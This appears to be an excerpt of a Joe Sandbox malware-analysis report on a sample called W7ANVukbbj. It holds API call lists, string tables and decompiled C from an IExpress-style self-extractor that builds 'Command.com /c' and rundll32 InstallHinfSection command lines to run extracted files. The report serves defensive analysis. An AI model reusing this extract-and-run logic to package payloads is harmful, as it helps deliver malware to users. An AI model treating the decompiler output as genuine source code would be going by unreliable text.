  • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
  • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
  • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
  • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
  • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
  • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00868C42), ref: 00863D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00863E26
• FreeLibrary.KERNEL32(00000000,?,00868C42), ref: 00863EFF
• LocalFree.KERNEL32(?,?,?,?,00868C42), ref: 00863F1F
• FreeLibrary.KERNEL32(00000000,?,00868C42), ref: 00863F40
• LocalFree.KERNEL32(?,?,?,?,00868C42), ref: 00863F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00868C42), ref: 00863F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00868C42), ref: 00863F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00868C42), ref: 00863FC2
Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$herso
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph (function starting at 861ae8; graph not reproduced)
                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E00861AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v527;
                                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                                          				char _v1552;
                                                                                                                                                                                                          				CHAR* _v1556;
                                                                                                                                                                                                          				int* _v1560;
                                                                                                                                                                                                          				CHAR** _v1564;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                          				CHAR* _t53;
                                                                                                                                                                                                          				CHAR* _t54;
                                                                                                                                                                                                          				char* _t57;
                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                          				CHAR* _t60;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				signed char _t65;
                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                          				unsigned int _t85;
                                                                                                                                                                                                          				CHAR* _t90;
                                                                                                                                                                                                          				CHAR* _t92;
                                                                                                                                                                                                          				char _t105;
                                                                                                                                                                                                          				char _t106;
                                                                                                                                                                                                          				CHAR** _t111;
                                                                                                                                                                                                          				CHAR* _t115;
                                                                                                                                                                                                          				intOrPtr* _t125;
                                                                                                                                                                                                          				void* _t126;
                                                                                                                                                                                                          				CHAR* _t132;
                                                                                                                                                                                                          				CHAR* _t135;
                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                          				void* _t145;
                                                                                                                                                                                                          				intOrPtr* _t146;
                                                                                                                                                                                                          				char* _t148;
                                                                                                                                                                                                          				CHAR* _t151;
                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                          				CHAR* _t155;
                                                                                                                                                                                                          				CHAR* _t156;
                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                          				signed int _t158;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t48 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                          				_t108 = __ecx;
                                                                                                                                                                                                          				_v1564 = _a4;
                                                                                                                                                                                                          				_v1560 = _a8;
                                                                                                                                                                                                          				E00861680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                          				if(_v528 != 0x22) {
                                                                                                                                                                                                          					_t135 = " ";
                                                                                                                                                                                                          					_t53 =  &_v528;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t135 = "\"";
                                                                                                                                                                                                          					_t53 =  &_v527;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t111 =  &_v1556;
                                                                                                                                                                                                          				_v1556 = _t53;
                                                                                                                                                                                                          				_t54 = E00861A84(_t111, _t135);
                                                                                                                                                                                                          				_t156 = _v1556;
                                                                                                                                                                                                          				_t151 = _t54;
                                                                                                                                                                                                          				if(_t156 == 0) {
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					_push(_t111);
                                                                                                                                                                                                          					E00861781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          					E0086658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t132 = _t156;
                                                                                                                                                                                                          					_t148 =  &(_t132[1]);
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t105 =  *_t132;
                                                                                                                                                                                                          						_t132 =  &(_t132[1]);
                                                                                                                                                                                                          					} while (_t105 != 0);
                                                                                                                                                                                                          					_t111 = _t132 - _t148;
                                                                                                                                                                                                          					if(_t111 < 3) {
                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t106 = _t156[1];
                                                                                                                                                                                                          					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                          						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						E00861680( &_v268, 0x104, _t156);
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						_t138 = 0x2e;
                                                                                                                                                                                                          						_t57 = E008666C8(_t156, _t138);
                                                                                                                                                                                                          						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                          							_t139 = 0x2e;
                                                                                                                                                                                                          							_t115 = _t156;
                                                                                                                                                                                                          							_t58 = E008666C8(_t115, _t139);
                                                                                                                                                                                                          							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                          								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                          								if(_t156 == 0) {
                                                                                                                                                                                                          									goto L43;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                          								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                          									E00861680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_push(_t115);
                                                                                                                                                                                                          									_t108 = 0x400;
                                                                                                                                                                                                          									E00861781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                          									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                          										E008616B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                          										E008616B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t140 = _t156;
                                                                                                                                                                                                          								 *_t156 = 0;
                                                                                                                                                                                                          								E00862AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                          								goto L53;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t108 = "Command.com /c %s";
                                                                                                                                                                                                          								_t125 = "Command.com /c %s";
                                                                                                                                                                                                          								_t145 = _t125 + 1;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t76 =  *_t125;
                                                                                                                                                                                                          									_t125 = _t125 + 1;
                                                                                                                                                                                                          								} while (_t76 != 0);
                                                                                                                                                                                                          								_t126 = _t125 - _t145;
                                                                                                                                                                                                          								_t146 =  &_v268;
                                                                                                                                                                                                          								_t157 = _t146 + 1;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t77 =  *_t146;
                                                                                                                                                                                                          									_t146 = _t146 + 1;
                                                                                                                                                                                                          								} while (_t77 != 0);
                                                                                                                                                                                                          								_t140 = _t146 - _t157;
                                                                                                                                                                                                          								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                          								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                          								if(_t156 != 0) {
                                                                                                                                                                                                          									E0086171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                          									goto L53;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L43;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                          							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                          								_t140 = 0x525;
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0x10);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_t60 =  &_v268;
                                                                                                                                                                                                          								goto L35;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t140 = "[";
                                                                                                                                                                                                          								_v1556 = _t151;
                                                                                                                                                                                                          								_t90 = E00861A84( &_v1556, "[");
                                                                                                                                                                                                          								if(_t90 != 0) {
                                                                                                                                                                                                          									if( *_t90 != 0) {
                                                                                                                                                                                                          										_v1556 = _t90;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t140 = "]";
                                                                                                                                                                                                          									E00861A84( &_v1556, "]");
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                          								if(_t156 == 0) {
                                                                                                                                                                                                          									L43:
                                                                                                                                                                                                          									_t60 = 0;
                                                                                                                                                                                                          									_t140 = 0x4b5;
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_push(0x10);
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									L35:
                                                                                                                                                                                                          									_push(_t60);
                                                                                                                                                                                                          									E008644B9(0, _t140);
                                                                                                                                                                                                          									_t62 = 0;
                                                                                                                                                                                                          									goto L54;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t155 = _v1556;
                                                                                                                                                                                                          									_t92 = _t155;
                                                                                                                                                                                                          									if( *_t155 == 0) {
                                                                                                                                                                                                          										_t92 = "DefaultInstall";
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									 *0x869120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                          									 *_v1560 = 1;
                                                                                                                                                                                                          									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x861140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                          										 *0x869a34 =  *0x869a34 & 0xfffffffb;
                                                                                                                                                                                                          										if( *0x869a40 != 0) {
                                                                                                                                                                                                          											_t108 = "setupapi.dll";
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t108 = "setupx.dll";
                                                                                                                                                                                                          											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										if( *_t155 == 0) {
                                                                                                                                                                                                          											_t155 = "DefaultInstall";
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_push( &_v268);
                                                                                                                                                                                                          										_push(_t155);
                                                                                                                                                                                                          										E0086171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										 *0x869a34 =  *0x869a34 | 0x00000004;
                                                                                                                                                                                                          										if( *_t155 == 0) {
                                                                                                                                                                                                          											_t155 = "DefaultInstall";
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										E00861680(_t108, 0x104, _t155);
                                                                                                                                                                                                          										_t140 = 0x200;
                                                                                                                                                                                                          										E00861680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L53:
                                                                                                                                                                                                          									_t62 = 1;
                                                                                                                                                                                                          									 *_v1564 = _t156;
                                                                                                                                                                                                          									L54:
                                                                                                                                                                                                          									_pop(_t152);
                                                                                                                                                                                                          									return E00866CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}
                                                                                                                                                                                                          0x00861b6b
                                                                                                                                                                                                          0x00861b6f
                                                                                                                                                                                                          0x00861b74
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861b76
                                                                                                                                                                                                          0x00861b7b
                                                                                                                                                                                                          0x00861b86
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861b8c
                                                                                                                                                                                                          0x00861b8c
                                                                                                                                                                                                          0x00861b98
                                                                                                                                                                                                          0x00861bc7
                                                                                                                                                                                                          0x00861bc9
                                                                                                                                                                                                          0x00861bcc
                                                                                                                                                                                                          0x00861bd3
                                                                                                                                                                                                          0x00861d75
                                                                                                                                                                                                          0x00861d76
                                                                                                                                                                                                          0x00861d78
                                                                                                                                                                                                          0x00861d7f
                                                                                                                                                                                                          0x00861e05
                                                                                                                                                                                                          0x00861e09
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861e12
                                                                                                                                                                                                          0x00861e1b
                                                                                                                                                                                                          0x00861e73
                                                                                                                                                                                                          0x00861e21
                                                                                                                                                                                                          0x00861e21
                                                                                                                                                                                                          0x00861e28
                                                                                                                                                                                                          0x00861e37
                                                                                                                                                                                                          0x00861e3e
                                                                                                                                                                                                          0x00861e52
                                                                                                                                                                                                          0x00861e60
                                                                                                                                                                                                          0x00861e60
                                                                                                                                                                                                          0x00861e3e
                                                                                                                                                                                                          0x00861e79
                                                                                                                                                                                                          0x00861e7b
                                                                                                                                                                                                          0x00861e84
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861d9b
                                                                                                                                                                                                          0x00861d9b
                                                                                                                                                                                                          0x00861da0
                                                                                                                                                                                                          0x00861da2
                                                                                                                                                                                                          0x00861da5
                                                                                                                                                                                                          0x00861da5
                                                                                                                                                                                                          0x00861da7
                                                                                                                                                                                                          0x00861da8
                                                                                                                                                                                                          0x00861dac
                                                                                                                                                                                                          0x00861dae
                                                                                                                                                                                                          0x00861db4
                                                                                                                                                                                                          0x00861db7
                                                                                                                                                                                                          0x00861db7
                                                                                                                                                                                                          0x00861db9
                                                                                                                                                                                                          0x00861dba
                                                                                                                                                                                                          0x00861dbe
                                                                                                                                                                                                          0x00861dc3
                                                                                                                                                                                                          0x00861dce
                                                                                                                                                                                                          0x00861dd2
                                                                                                                                                                                                          0x00861deb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861df0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861dd2
                                                                                                                                                                                                          0x00861bf7
                                                                                                                                                                                                          0x00861bfe
                                                                                                                                                                                                          0x00861c07
                                                                                                                                                                                                          0x00861d55
                                                                                                                                                                                                          0x00861d5a
                                                                                                                                                                                                          0x00861d5b
                                                                                                                                                                                                          0x00861d5d
                                                                                                                                                                                                          0x00861d5e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861c1b
                                                                                                                                                                                                          0x00861c1b
                                                                                                                                                                                                          0x00861c20
                                                                                                                                                                                                          0x00861c2c
                                                                                                                                                                                                          0x00861c33
                                                                                                                                                                                                          0x00861c38
                                                                                                                                                                                                          0x00861c3a
                                                                                                                                                                                                          0x00861c3a
                                                                                                                                                                                                          0x00861c40
                                                                                                                                                                                                          0x00861c4b
                                                                                                                                                                                                          0x00861c4b
                                                                                                                                                                                                          0x00861c5d
                                                                                                                                                                                                          0x00861c61
                                                                                                                                                                                                          0x00861dd4
                                                                                                                                                                                                          0x00861dd4
                                                                                                                                                                                                          0x00861dd6
                                                                                                                                                                                                          0x00861ddb
                                                                                                                                                                                                          0x00861ddc
                                                                                                                                                                                                          0x00861dde
                                                                                                                                                                                                          0x00861d64
                                                                                                                                                                                                          0x00861d64
                                                                                                                                                                                                          0x00861d67
                                                                                                                                                                                                          0x00861d6c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861c67
                                                                                                                                                                                                          0x00861c67
                                                                                                                                                                                                          0x00861c6d
                                                                                                                                                                                                          0x00861c72
                                                                                                                                                                                                          0x00861c74
                                                                                                                                                                                                          0x00861c74
                                                                                                                                                                                                          0x00861c8e
                                                                                                                                                                                                          0x00861c99
                                                                                                                                                                                                          0x00861cc0
                                                                                                                                                                                                          0x00861cf8
                                                                                                                                                                                                          0x00861d07
                                                                                                                                                                                                          0x00861d23
                                                                                                                                                                                                          0x00861d09
                                                                                                                                                                                                          0x00861d14
                                                                                                                                                                                                          0x00861d1b
                                                                                                                                                                                                          0x00861d1b
                                                                                                                                                                                                          0x00861d2b
                                                                                                                                                                                                          0x00861d2d
                                                                                                                                                                                                          0x00861d2d
                                                                                                                                                                                                          0x00861d38
                                                                                                                                                                                                          0x00861d39
                                                                                                                                                                                                          0x00861d46
                                                                                                                                                                                                          0x00861cc2
                                                                                                                                                                                                          0x00861cc2
                                                                                                                                                                                                          0x00861ccc
                                                                                                                                                                                                          0x00861cce
                                                                                                                                                                                                          0x00861cce
                                                                                                                                                                                                          0x00861cdb
                                                                                                                                                                                                          0x00861ce6
                                                                                                                                                                                                          0x00861cee
                                                                                                                                                                                                          0x00861cee

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00861BE7
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00861BFE
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00861C57
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00861C88
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00861140,00000000,00000008,?), ref: 00861CB8
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00861D1B
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                          • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                          • API String ID: 383838535-3368923722
                                                                                                                                                                                                          • Opcode ID: 08f15d466a975b18a46d7a186808435af1c8b46612153245fd08a7129df11ef5
                                                                                                                                                                                                          • Instruction ID: aa191c3af610e5376c7b01c57044c7fcb91416b061e3246b9aa507a5ca41ae5c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f15d466a975b18a46d7a186808435af1c8b46612153245fd08a7129df11ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50A13770A002186BEF20DB28CC4DFEA7769FB52310F1E0295E555E72C2DBB59E85CB51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          [Control-flow graph of function 0086597D; legend: Executed / Not Executed]
                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E0086597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                                          				long _v792;
                                                                                                                                                                                                          				long _v796;
                                                                                                                                                                                                          				long _v800;
                                                                                                                                                                                                          				signed int _v804;
                                                                                                                                                                                                          				long _v808;
                                                                                                                                                                                                          				int _v812;
                                                                                                                                                                                                          				long _v816;
                                                                                                                                                                                                          				long _v820;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                          				signed short _t78;
                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                          				int _t102;
                                                                                                                                                                                                          				unsigned int _t103;
                                                                                                                                                                                                          				unsigned int _t105;
                                                                                                                                                                                                          				signed int _t111;
                                                                                                                                                                                                          				long _t112;
                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                          				CHAR* _t118;
                                                                                                                                                                                                          				signed int _t119;
                                                                                                                                                                                                          				signed int _t120;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t114 = __edi;
                                                                                                                                                                                                          				_t46 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                          				_v804 = __edx;
                                                                                                                                                                                                          				_t118 = __ecx;
                                                                                                                                                                                                          				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                          				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                          				if(_t50 != 0) {
                                                                                                                                                                                                          					_push(__edi);
                                                                                                                                                                                                          					_v796 = 0;
                                                                                                                                                                                                          					_v792 = 0;
                                                                                                                                                                                                          					_v800 = 0;
                                                                                                                                                                                                          					_v808 = 0;
                                                                                                                                                                                                          					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                          					__eflags = _t55;
                                                                                                                                                                                                          					if(_t55 == 0) {
                                                                                                                                                                                                          						L29:
                                                                                                                                                                                                          						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                          						 *0x869124 = E00866285();
                                                                                                                                                                                                          						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                          						_t110 = 0x4b0;
                                                                                                                                                                                                          						L30:
                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                          						E008644B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                          						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                          						L31:
                                                                                                                                                                                                          						_t66 = 0;
                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                          						L32:
                                                                                                                                                                                                          						_pop(_t114);
                                                                                                                                                                                                          						goto L33;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t69 = _v792 * _v796;
                                                                                                                                                                                                          					_v812 = _t69;
                                                                                                                                                                                                          					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                          					__eflags = _t116;
                                                                                                                                                                                                          					if(_t116 == 0) {
                                                                                                                                                                                                          						goto L29;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                          					__eflags = _t73;
                                                                                                                                                                                                          					if(_t73 != 0) {
                                                                                                                                                                                                          						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                          						_t101 =  &_v16;
                                                                                                                                                                                                          						_t111 = 6;
                                                                                                                                                                                                          						_t119 = _t118 - _t101;
                                                                                                                                                                                                          						__eflags = _t119;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                          							__eflags = _t22;
                                                                                                                                                                                                          							if(_t22 == 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                          							__eflags = _t87;
                                                                                                                                                                                                          							if(_t87 == 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *_t101 = _t87;
                                                                                                                                                                                                          							_t101 = _t101 + 1;
                                                                                                                                                                                                          							_t111 = _t111 - 1;
                                                                                                                                                                                                          							__eflags = _t111;
                                                                                                                                                                                                          							if(_t111 != 0) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t111;
                                                                                                                                                                                                          						if(_t111 == 0) {
                                                                                                                                                                                                          							_t101 = _t101 - 1;
                                                                                                                                                                                                          							__eflags = _t101;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *_t101 = 0;
                                                                                                                                                                                                          						_t112 = 0x200;
                                                                                                                                                                                                          						_t102 = _v812;
                                                                                                                                                                                                          						_t78 = 0;
                                                                                                                                                                                                          						_t118 = 8;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							__eflags = _t102 - _t112;
                                                                                                                                                                                                          							if(_t102 == _t112) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t112 = _t112 + _t112;
                                                                                                                                                                                                          							_t78 = _t78 + 1;
                                                                                                                                                                                                          							__eflags = _t78 - _t118;
                                                                                                                                                                                                          							if(_t78 < _t118) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t78 - _t118;
                                                                                                                                                                                                          						if(_t78 != _t118) {
                                                                                                                                                                                                          							__eflags =  *0x869a34 & 0x00000008;
                                                                                                                                                                                                          							if(( *0x869a34 & 0x00000008) == 0) {
                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                          								_t103 =  *0x869a38; // 0x0
                                                                                                                                                                                                          								_t110 =  *((intOrPtr*)(0x8689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                          								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                          								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                          									__eflags = _v804 & 0x00000001;
